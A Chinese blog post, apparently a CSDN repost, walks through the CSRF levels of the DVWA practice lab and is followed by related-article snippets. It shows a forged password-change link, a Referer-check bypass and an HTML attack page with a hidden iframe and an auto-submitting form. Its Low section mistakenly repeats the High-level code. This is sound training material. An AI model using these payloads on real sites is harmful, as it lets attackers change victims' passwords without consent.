CSRF 跨站点请求伪造

最新推荐文章于 2023-03-30 08:51:03 发布
最新推荐文章于 2023-03-30 08:51:03 发布
阅读量241 收藏
点赞数
原文链接:http://www.cnblogs.com/xuyj/p/10251057.html
版权

CSRF 跨站点请求伪造

Low

实验原理:服务端代码

<?php 

if( isset( $_GET[ 'Change' ] ) ) { 
    // Check Anti-CSRF token 
    checkToken( $_REQUEST[ 'user_token' ], $_SESSION[ 'session_token' ], 'index.php' ); 

    // Get input 
    $pass_new  = $_GET[ 'password_new' ]; 
    $pass_conf = $_GET[ 'password_conf' ]; 

    // Do the passwords match? 
    if( $pass_new == $pass_conf ) { 
        // They do! 
        $pass_new = mysql_real_escape_string( $pass_new ); 
        $pass_new = md5( $pass_new ); 

        // Update the database 
        $insert = "UPDATE `users` SET password = '$pass_new' WHERE user = '" . dvwaCurrentUser() . "';"; 
        $result = mysql_query( $insert ) or die( '<pre>' . mysql_error() . '</pre>' ); 

        // Feedback for the user 
        echo "<pre>Password Changed.</pre>"; 
    } 
    else { 
        // Issue with passwords matching 
        echo "<pre>Passwords did not match.</pre>"; 
    } 

    mysql_close(); 
} 

// Generate Anti-CSRF token 
generateSessionToken();

可以看到,High级别的代码加入了Anti-CSRF token机制,用户每次访问改密页面时,服务器会返回一个随机的token,向服务器发起请求时,需要提交token参数,而服务器在收到请求时,会优先检查token,只有token正确,才会处理客户端的请求。

漏洞分析

要绕过High级别的反CSRF机制,关键是要获取token,要利用受害者的cookie去修改密码的页面获取关键的token。
试着去构造一个攻击页面,将其放置在攻击者的服务器,引诱受害者访问,从而完成CSRF攻击,下面是代码。

1、构造链接

A) 最基础的:
http://192.168.153.130/dvwa/vulnerabilities/csrf/?password_new=password&password_conf=password&Change=Change#

Meduim

实验原理:

<?php 

if( isset( $_GET[ 'Change' ] ) ) { 
    // Checks to see where the request came from 
    if( eregi( $_SERVER[ 'SERVER_NAME' ], $_SERVER[ 'HTTP_REFERER' ] ) ) { 
        // Get input 
        $pass_new  = $_GET[ 'password_new' ]; 
        $pass_conf = $_GET[ 'password_conf' ]; 

        // Do the passwords match? 
        if( $pass_new == $pass_conf ) { 
            // They do! 
            $pass_new = mysql_real_escape_string( $pass_new ); 
            $pass_new = md5( $pass_new ); 

            // Update the database 
            $insert = "UPDATE `users` SET password = '$pass_new' WHERE user = '" . dvwaCurrentUser() . "';"; 
            $result = mysql_query( $insert ) or die( '<pre>' . mysql_error() . '</pre>' ); 

            // Feedback for the user 
            echo "<pre>Password Changed.</pre>"; 
        } 
        else { 
            // Issue with passwords matching 
            echo "<pre>Passwords did not match.</pre>"; 
        } 
    } 
    else { 
        // Didn't come from a trusted source 
        echo "<pre>That request didn't look correct.</pre>"; 
    } 

    mysql_close(); 
}

检查string中是否含有pattern(不区分大小写),如果有返回True,反之False。
可以看到,Medium级别的代码检查了保留变量 HTTP_REFERER(http包头的Referer参数的值,表示来源地址)中是否包含SERVER_NAME(http包头的Host参数,及要访问的主机名,这里是192.168.153.130),希望通过这种机制抵御CSRF攻击。

漏洞利用

过滤规则是http包头的Referer参数的值中必须包含主机名(这里是192.168.153.130)
我们可以将攻击页面命名为192.168.153.130.html(页面被放置在攻击者的服务器里,这里是10.4.253.2)就可以绕过了

High

服务器端核心代码

<?php 

if( isset( $_GET[ 'Change' ] ) ) { 
// Check Anti-CSRF token 
checkToken( $_REQUEST[ 'user_token' ], $_SESSION[ 'session_token' ], 'index.php' ); 

// Get input 
$pass_new  = $_GET[ 'password_new' ]; 
$pass_conf = $_GET[ 'password_conf' ]; 

// Do the passwords match? 
if( $pass_new == $pass_conf ) { 
    // They do! 
    $pass_new = mysql_real_escape_string( $pass_new ); 
    $pass_new = md5( $pass_new ); 

    // Update the database 
    $insert = "UPDATE `users` SET password = '$pass_new' WHERE user = '" . dvwaCurrentUser() . "';"; 
    $result = mysql_query( $insert ) or die( '<pre>' . mysql_error() . '</pre>' ); 

    // Feedback for the user 
    echo "<pre>Password Changed.</pre>"; 
} 
else { 
    // Issue with passwords matching 
    echo "<pre>Passwords did not match.</pre>"; 
} 

mysql_close(); 
} 

// Generate Anti-CSRF token 
generateSessionToken(); 

?>

可以看到,High级别的代码加入了Anti-CSRF token机制,用户每次访问改密页面时,服务器会返回一个随机的token,向服务器发起请求时,需要提交token参数,而服务器在收到请求时,会优先检查token,只有token正确,才会处理客户端的请求。
漏洞利用
要绕过High级别的反CSRF机制,关键是要获取token,要利用受害者的cookie去修改密码的页面获取关键的token。
试着去构造一个攻击页面,将其放置在攻击者的服务器,引诱受害者访问,从而完成CSRF攻击,下面是代码。

<iframe src="http://192.168.43.38/dvwa/vulnerabilities/csrf" id="hack" border="0" style="display:none;">
</iframe>
 
<body onload="attack()">
  <form method="GET" id="transfer" action="http://192.168.43.38/dvwa/vulnerabilities/csrf">
   <input type="hidden" name="password_new" value="password">
    <input type="hidden" name="password_conf" value="password">
   <input type="hidden" name="user_token" value="889b0def3b0cf95500a3e8ca1eeeec74">
  <input type="hidden" name="Change" value="Change">
   </form>
</body>

攻击思路

是当受害者点击进入这个页面,脚本会通过一个看不见框架偷偷访问修改密码的页面,获取页面中的token,并向服务器发送改密请求,以完成CSRF攻击。

而现在的浏览器是不允许跨域请求的

这里简单解释下跨域,我们的框架iframe访问的地址是http://192.168.43.38/dvwa/vulnerabilities/csrf,位于服务器192.168.43.38上,而我们的攻击页面位于黑客服务器x.x.x.x上,两者的域名不同,域名B下的所有页面都不允许主动获取域名A下的页面内容,除非域名A下的页面主动发送信息给域名B的页面,所以我们的攻击脚本是不可能取到改密界面中的user_token。
由于跨域是不能实现的,所以我们要将攻击代码注入到目标服务器192.168.43.38中,才有可能完成攻击。下面利用High级别的XSS漏洞协助获取Anti-CSRF token(因为这里的XSS注入有长度限制,不能够注入完整的攻击脚本,所以只获取Anti-CSRF token)。

转载于:https://www.cnblogs.com/xuyj/p/10251057.html

weixin_30664051
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
DVWA靶场不可能难度的命令执行漏洞的代码
weixin_68133652的博客
06-09 143
checkToken() 函数:该函数用于对比用户提交的 token 值和服务器端设置的 token 值是否相等,以确保请求是合法的,可以防止站点请求伪造CSRF)攻击。这个 if 判断用户输入的 IP 地址是否符合规范,首先要求 $octet 数组中的前四个元素都必须是数值,然后要求 $octet 数组的大小必须为 4。获取用户提交的 IP 地址。
【WEB安全】PHP靶场实战分析——DVWA
真哥的博客
12-20 3781
文章目录前言一、实战前的准备:1.dvwa靶场安装2.代码审计工具介绍2.1.seay代码审计工具的介绍2.2.rips 审计工具介绍二、DVWA通关讲解1. brute force 暴力破解low:Medium:High:impossible:2. Command Injection(命令行注入)low:Medium:High:3. CSRF请求伪造)low:Medium:High:4. File Inclusion(文件包含)low:Medium:High:impossible:5. File U
DVWA-命令注入
qq_60848021的博客
06-26 1621
命令注入漏洞的函数:system(),exec(),passthru(),shell_exec(),''(与shell_exec()功能相同。1,分析源码使用的函数是shell_exec()2,验证3,漏洞测试| :前面命令的输出结果作为后面命令的输入;||:前面的命令执行失败以后才会执行后面的命令;&:前面的命令执行后接着执行候命的命令;&&:前面的命令执行成功以后才可以执行下面的命令。存疑:当使用;连接时,出现错误原因是DVWA的服务器是winserver2008,” ; “分号是应用在linux系统中
DVWA--反射型XSS(Reflected)攻略详解
Silver_lion的博客
08-13 5708
目录 Low等级 Low等级 输入<script>alert(/xss/)</script>测试漏洞,成功弹框 注:可以弹窗的函数有alert(),confirm(),prompt()
PHP代码审计入门-DVWA靶场暴力破解篇
身高两米不到的博客
11-10 1401
从零学习php,最终目的实现代码审计入门,软件采用sublime text,环境使用phpstudy搭建,数据库是navicat,需要有基本的前端基础、简单的php+mysql后端基础、渗透知识和漏洞原理,文章跟随流沙前辈学习记录,看看曾经遥不可及的代码审计能不能慢慢啃下来。这里相较于low,最大的区别点在于使用mysqli_real_escape_string()函数进行转义以防止恶意注入,所以万能密码登陆用不了了。本章为代码审计入门第五篇-DVWA靶场篇,对DVWA靶场漏洞进行代码审计。
DVWA练习2-CSRF
seeicb的博客
03-11 247
title: DVWA练习2-CSRF date: 2016-01-03 01:44:17 categories: 安全 tags: Web安全 一、CSRF 1.CSRF简介 CSRF请求伪造,是一种使已登录用户在不知情的情况下执行某种动作的攻击。因为攻击者看不到伪造请求的响应结果,所以CSRF攻击主要用来执行动作,而非窃取用户数据。当受害者是一个普通用户时,CSRF可以实现在其不知情的情...
Django中如何防范CSRF站点请求伪造攻击的实现
12-26
CSRF站点请求伪造(Cross—Site Request Forgery)。 攻击者盗用了你的身份,以你的名义发送恶意请求,对服务器来说这个请求是完全合法的,但是却完成了攻击者所期望的一个操作,比如以你的名义发送邮件、发消息,...
CSRF请求伪造,含使用教程和测试工具
05-04
CSRF请求伪造,使用OWASP CSRFTester工具可以抓取并伪造请求,其测试原理是,使用代理抓取我们在浏览器中访问过的所有的连接以及所有的表单等信息,通过在CSRFTester中修改相应的表单等信息,重新提交,相当于一...
CSRF请求伪造)详细说明
02-26
Cross-SiteRequestForgery(CSRF),中文一般译作请求伪造。经常入选owasp漏洞列表Top10,在当前web漏洞排行中,与XSS和SQL注入并列前三。与前两者相比,CSRF相对来说受到的关注要小很多,但是危害却非常大。...
CSRF请求伪造实例程序
11-07
一个php做的简单的银行管理系统,利用cookie值来达到伪造请求的目的,最终造成银行账户余额被修改。
「第四章」站点请求伪造(CSRF)
hacckjacking
01-22 487
「第四章」站点请求伪造(CSRF) 批注 [……] 表示他人、自己、网络批注 参考资料来源于 * 书中批注 * CSDN * GitHub * Google * 维基百科 * YouTube * MDN Web Docs ...
保护您的 ASP.NET 应用程序
Lassewang的成长历程
02-03 1290
在上一期中,我讨论了构建 Web 应用程序安全性的重要性,并介绍了包括 SQL 注入和参数篡改在内的一些攻击类型,以及如何防范这些类型的攻击 (msdn.microsoft.com/magazine/hh580736)。 在本文中,我将深入探讨以下两种更常见的攻击,以帮助完善我们的应用程序保护体系:站点脚本 (XSS) 和站点请求伪造 (CSRF)。 您可能很想知道: 只使用生产安全扫
什么前端域?如何解决域问题?什么是域攻击?
tyxjolin的专栏
03-30 1289
域问题是前端开发中一个常见的问题。本文介绍了域问题的原因、常见的域解决方案、域攻击方式以及域安全措施。在实际开发中,需要根据具体的情况选择合适的域解决方案,并且需要注意请求的安全性。
一个比较好用的CSRF请求伪造工具类
孔方子的博客
02-25 662
前言描述:最近项目里,安全测试组发现通过SQL注入可以轻松登录后台管理系统,于是就加了个CSRF请求伪造功能,防止被恶意登录。 以下是代码部分: package com.faw.***.common.xss; import java.io.IOException; import javax.servlet.Filter; import javax.servlet.FilterChain; ...
web基础漏洞之CSRF请求伪造漏洞)
m0_62274649的博客
10-04 1219
一些自己的小总结,有待完善
CSRF站点请求伪造
qq_26054303的博客
04-27 691
CSRF(Cross-site request forgery),中文名称:请求伪造,也被称为:one click attack/session riding,缩写为:CSRF/XSRF,CSRF攻击:攻击者盗用了你的身份,以你的名义发送恶意请求 例如: 你登陆了一个网站http://blog.sohu.com 然后你又访问了恶意的网站www.abc.com,他构造了一个恶意的请求
请求伪造CSRF
whoim_i的博客
11-24 4697
目录原理解释CSRF分类GET型POST型CSRF漏洞挖掘使用burpsuite快速生成CSRF poc防御手段 原理解释 画个丑图来解释一波 1、 用户输入账号信息请求登录A网站。 2、 A网站验证用户信息,通过验证后返回给用户一个cookie 3、 在未退出网站A之前,在同一浏览器中请求了黑客构造的恶意网站B 4、 B网站收到用户请求后返回攻击性代码,构造访问A网站的语句 5、 浏览器收到攻...
Web Security Academy 站点伪造请求CSRF
汗的博客
12-08 711
笔者Burpsuite Web 安全学院的学习笔记 Burpsuite Web 安全学院:Cross-site request forgery (CSRF)
CSRF请求伪造漏洞
最新发布
12-06
CSRF(Cross-site request forgery)请求伪造是一种...3. 在cookie中添加SameSite属性,限制cookie只能在同站点请求中发送,从而防止请求伪造攻击。 --相关问题--: 1. 什么是XSS漏洞? 2. 如何防御XSS攻击? 3

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值